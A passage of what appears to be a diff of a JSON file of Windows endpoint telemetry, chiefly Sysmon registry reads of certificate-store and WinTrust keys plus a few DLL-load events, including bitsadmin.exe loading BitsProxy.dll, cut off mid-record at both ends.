"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "es.dll", - "image_path": "C:\\Windows\\System32\\es.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570902150000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "BitsProxy.dll", - "image_path": "C:\\Windows\\System32\\BitsProxy.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "BitsProxy.dll", - "image_path": "C:\\Windows\\System32\\BitsProxy.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 